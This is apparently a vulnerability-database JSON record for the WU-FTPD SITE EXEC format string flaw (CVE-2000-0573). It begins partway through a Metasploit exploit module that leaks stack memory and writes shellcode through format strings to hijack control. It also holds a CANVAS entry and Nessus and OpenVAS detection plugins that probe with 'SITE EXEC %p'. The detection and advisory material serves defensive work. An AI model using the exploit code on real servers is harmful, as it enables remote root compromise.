Array.new\n extra = \"aaaabbbb\"\n 1000.times do |x|\n dw = fmtstr_stack_read(x+1, extra)\n break if not dw\n stack << dw\n end\n\n stack_data = stack.pack('V*')\n print_status(\"Obtained #{stack.length*4} bytes of stack data:\\n\" + Rex::Text.to_hex_dump(stack_data))\n\n # detect the number of pad bytes\n idx = stack_data.index(\"aaaabbbb\")\n if not idx\n fail_with(Failure::Unknown, \"Whoa, didn't find the static bytes on the stack!\")\n end\n num_pad = 0\n num_pad = 4 - (idx % 4) if (idx % 4) > 0\n mytarget.opts['PadBytes'] = num_pad\n\n # calculate the number of pops needed to hit our addr\n num_pops = (idx + num_pad) / 4\n mytarget.opts['NumPops'] = num_pops\n else\n num_pad = mytarget['PadBytes']\n num_pops = mytarget['NumPops']\n sc_loc = mytarget['Writable']\n ret = mytarget['FlowHook']\n end\n\n print_status(\"Number of pad bytes: #{num_pad}\")\n print_status(\"Number of pops: #{num_pops}\")\n\n # debugging -> don't try it!\n return if mytarget.name == \"Debug\"\n\n #print_status(\"ATTACH!\")\n #select(nil,nil,nil,5)\n\n fmtstr_detect_caps\n\n # compute the stack return address using the fmt to leak memory\n addr_pops = mytarget['AddrPops']\n offset = mytarget['Offset']\n if addr_pops > 0\n stackaddr = fmtstr_stack_read(addr_pops)\n print_status(\"Read %#x from offset %d\" % [stackaddr, addr_pops])\n ret = stackaddr + offset\n end\n\n print_status(\"Writing shellcode to: %#x\" % sc_loc)\n print_status(\"Hijacking control via %#x\" % ret)\n\n\n # no extra bytes before the padding..\n num_start = 0\n\n # write shellcode to 'writable'\n arr = fmtstr_gen_array_from_buf(sc_loc, payload.encoded, mytarget)\n\n # process it in groups of 24 (max ~400 bytes per command)\n sc_num = 1\n while arr.length > 0\n print_status(\"Sending part #{sc_num} of the payload...\")\n sc_num += 1\n\n narr = arr.slice!(0..24)\n\n fmtbuf = fmtstr_gen_from_array(num_start, narr, mytarget)\n # a space allows the next part to start with a '/'\n fmtbuf[num_pad-1,1] = \" \"\n fmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\n if ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true)))\n if res[0,4] == \"500 \"\n fail_with(Failure::Unknown, \"Something went wrong when uploading the payload...\")\n end\n end\n end\n\n\n # write 'writable' addr to flowhook (execute shellcode)\n # NOTE: the resulting two writes must be done at the same time\n print_status(\"Attempting to write %#x to %#x..\" % [sc_loc, ret])\n\n fmtbuf = generate_fmt_two_shorts(num_start, ret, sc_loc, mytarget)\n # a space allows the next part to start with a '/'\n fmtbuf[num_pad-1,1] = \" \"\n fmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\n # don't wait for the response here :)\n res = send_cmd(['SITE', 'EXEC', fmtbuf], false)\n\n print_status(\"Your payload should have executed now...\")\n handler\n end\n\n\n #\n # these two functions are used to read stack memory\n # (used by fmtstr_stack_read()\n #\n def trigger_fmt(fmtstr)\n return nil if fmtstr.length >= (512 - (4+1 + 4+1 + 2 + 2))\n send_cmd(['SITE', 'EXEC', 'x', fmtstr], true)\n end\n\n def extract_fmt_output(res)\n if (res =~ /^5.. /)\n #throw \"Crap! Something went wrong while dumping the stack...\"\n return nil\n end\n ret = res.strip.split(/\\r?\\n/)[0]\n ret = ret[6,ret.length]\n return ret\n end\n\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/ftp/wuftpd_site_exec_format.rb"}], "canvas": [{"lastseen": "2019-05-29T17:19:20", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "description": "**Name**| wuftpd_sexec \n---|--- \n**CVE**| CVE-2000-0573 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| WuFTPD SITE EXEC Formatstring Bug \n**Notes**| References: http://www.securityfocus.com/bid/1387 \nCVE Name: CVE-2000-0573 \nVENDOR: wuftpd.org \nRepeatability: Multiple tries \nDate public: 22-06-2000 \nCERT Advisory: http://www.cert.org/advisories/CA-2000-13.html \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0573 \nCVSS: 10.0 \n\n", "edition": 2, "modified": "2000-07-07T04:00:00", "published": "2000-07-07T04:00:00", "id": "WUFTPD_SEXEC", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/wuftpd_sexec", "type": "canvas", "title": "Immunity Canvas: WUFTPD_SEXEC", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T07:01:06", "description": "The version of WU-FTPD hosted on the remote server does not properly\nsanitize the argument of the SITE EXEC command. It may be possible for\na remote attacker to gain root access.", "edition": 25, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2000-06-27T00:00:00", "title": "WU-FTPD site_exec() Function Remote Format String", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2000-0573"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "WU_FTPD_SITE_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/10452", "sourceData": "#\n# This script was written by Alexis de Bernis <alexisb@nessus.org>\n#\n\n# Changes by Tenable:\n# - rely on the banner if we could not log in\n# - changed the description to include a Solution:\n# - revised plugin title, removed unrelated CVE ref (2/04/2009)\n#\n# See the Nessus Scripts License for details\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10452);\n script_version(\"1.49\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2000-0573\");\n script_bugtraq_id(726, 1387, 2240);\n\n script_name(english:\"WU-FTPD site_exec() Function Remote Format String\");\n script_summary(english:\"Checks if the remote FTP server sanitizes the SITE EXEC command\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running an FTP server with a remote root\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of WU-FTPD hosted on the remote server does not properly\nsanitize the argument of the SITE EXEC command. It may be possible for\na remote attacker to gain root access.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=bugtraq&m=96171893218000&w=2\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to WU-FTPD version 2.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2000-0573\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WU-FTPD SITE EXEC/INDEX Format String Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2000/06/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2000-2018 A. de Bernis\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_anonymous.nasl\");\n script_require_keys(\"ftp/wuftpd\");\n script_require_ports(\"Services/ftp\", 21);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ftp_func.inc\");\n\nlogin = get_kb_item(\"ftp/login\");\npass = get_kb_item(\"ftp/password\");\n\n# Connect to the FTP server\nport = get_ftp_port(default: 21);\n\nftpport = port;\n\nif(login)\n{\n soc = ftp_open_and_authenticate( user:login, pass:pass, port:port );\n if(soc)\n {\n # We are in\n c = 'SITE EXEC %p \\r\\n';\n send(socket:soc, data:c);\n b = recv(socket:soc, length:6);\n if(b == \"200-0x\") security_hole(ftpport);\n ftp_close(socket: soc);\n exit(0);\n }\n else\n {\n soc = open_sock_tcp(ftpport);\n if (! soc ) audit(AUDIT_SOCK_FAIL,ftpport);\n r = ftp_recv_line(socket:soc);\n close(soc);\n }\n}\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n if(egrep(pattern:\"220.*FTP server.*[vV]ersion (wu|wuftpd)-((1\\..*)|(2\\.[0-5]\\..*)|(2\\.6\\.0)).*\",\n \t string:r)){\n\t report = \"\nNessus is solely basing this finding on the version reported\nin the banner, so this may be a false positive.\n\";\n\t security_hole(port:ftpport, extra:report);\n\t }\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:32:01", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0997", "CVE-2000-0573"], "description": "The remote FTP server does not properly sanitize the argument of\n the SITE EXEC command.", "modified": "2019-02-12T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010452", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010452", "type": "openvas", "title": "wu-ftpd SITE EXEC vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: wu_ftpd_site_exec.nasl 13602 2019-02-12 12:47:59Z cfischer $\n#\n# wu-ftpd SITE EXEC vulnerability\n#\n# Authors:\n# Alexis de Bernis <alexisb@nessus.org>\n# changes by rd :\n# - rely on the banner if we could not log in\n# - changed the description to include a Solution:\n#\n# Copyright:\n# Copyright (C) 2000 A. de Bernis\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:washington_university:wu-ftpd\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10452\");\n script_version(\"$Revision: 13602 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-12 13:47:59 +0100 (Tue, 12 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1387, 2240, 726);\n script_xref(name:\"IAVA\", value:\"2000-a-0004\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2000-0573\", \"CVE-1999-0997\");\n script_name(\"wu-ftpd SITE EXEC vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"FTP\");\n script_copyright(\"This script is Copyright (C) 2000 A. de Bernis\");\n script_dependencies(\"gb_wu-ftpd_detect.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"wu-ftpd/installed\");\n\n script_tag(name:\"summary\", value:\"The remote FTP server does not properly sanitize the argument of\n the SITE EXEC command.\");\n\n script_tag(name:\"impact\", value:\"It may be possible for a remote attacker to gain root access.\");\n\n script_tag(name:\"solution\", value:\"Upgrade your wu-ftpd server (<= 2.6.0 are vulnerable)\n or disable any access from untrusted users (especially anonymous).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( egrep( pattern:\"^((1\\..*)|(2\\.[0-5]\\..*)|(2\\.6\\.0))\", string: vers ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"2.6.1\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:07", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0997", "CVE-2000-0573"], "description": "The remote FTP server does not properly sanitize the argument of\nthe SITE EXEC command.\nIt may be possible for a remote attacker\nto gain root access.", "modified": "2017-04-28T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:10452", "href": "http://plugins.openvas.org/nasl.php?oid=10452", "type": "openvas", "title": "wu-ftpd SITE EXEC vulnerability", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: wu_ftpd_site_exec.nasl 6046 2017-04-28 09:02:54Z teissa $\n# Description: wu-ftpd SITE EXEC vulnerability\n#\n# Authors:\n# Alexis de Bernis <alexisb@nessus.org>\n# changes by rd :\n# - rely on the banner if we could not log in\n# - changed the description to include a Solution:\n#\n# Copyright:\n# Copyright (C) 2000 A. de Bernis\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote FTP server does not properly sanitize the argument of\nthe SITE EXEC command.\nIt may be possible for a remote attacker\nto gain root access.\";\n\ntag_solution = \"Upgrade your wu-ftpd server (<= 2.6.0 are vulnerable)\nor disable any access from untrusted users (especially anonymous).\";\n\nif(description)\n{\n script_id(10452);\n script_version(\"$Revision: 6046 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-28 11:02:54 +0200 (Fri, 28 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1387, 2240, 726);\n script_xref(name:\"IAVA\", value:\"2000-a-0004\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2000-0573\", \"CVE-1999-0997\");\n \n name = \"wu-ftpd SITE EXEC vulnerability\";\n \n script_name(name);\n \n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"FTP\");\n\n \n script_copyright(\"This script is Copyright (C) 2000 A. de Bernis\");\n \n script_dependencies(\"find_service.nasl\", \"secpod_ftp_anonymous.nasl\",\n \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_require_keys(\"ftp/wuftpd\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here : \n#\n\ninclude(\"ftp_func.inc\");\n\nlogin = get_kb_item(\"ftp/login\");\npass = get_kb_item(\"ftp/password\");\n\n\n\nport = get_kb_item(\"Services/ftp\");\nif(!port)port = 21;\nif(!get_port_state(port))exit(0);\n\n\n# Connect to the FTP server\nsoc = open_sock_tcp(port);\nftpport = port;\nif(soc)\n{\n if(login)\n {\n if(ftp_authenticate(socket:soc, user:login, pass:pass))\n {\n # We are in\n c = string(\"SITE EXEC %p \\r\\n\");\n send(socket:soc, data:c);\n b = recv(socket:soc, length:6);\n if(b == \"200-0x\") security_message(ftpport);\n quit = string(\"QUIT\\r\\n\");\n send(socket:soc, data:quit);\n r = ftp_recv_line(socket:soc);\n close(soc);\n exit(0);\n }\n else {\n \tclose(soc);\n\tsoc = open_sock_tcp(ftpport);\n\t}\n }\n if(!soc)soc = open_sock_tcp(ftpport);\n if(!soc)exit(0);\n r = ftp_recv_line(socket:soc);\n close(soc);\n if(egrep(pattern:\"220.*FTP server.*[vV]ersion wu-((1\\..*)|(2\\.[0-5]\\..*)|(2\\.6\\.0)).*\",\n \t string:r)){\n\t data = string(\n\"You are running a version of wu-ftpd which is older or\\n\",\n\"as old as version 2.6.0.\\n\",\n\"These versions do not sanitize the user input properly\\n\",\n\"and allow an intruder to execute arbitrary code through\\n\",\n\"the command SITE EXEC.\\n\\n\",\n\"*** OpenVAS did not log into this server\\n\",\n\"*** so it could not determine whether the option SITE\\n\",\n\"*** EXEC was activated or not, so this message may be\\n\",\n\"*** a false positive\\n\\n\",\n\"Solution: upgrade to wu-ftpd 2.6.1\");\n\t security_message(port:ftpport, data:data);\n\t }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}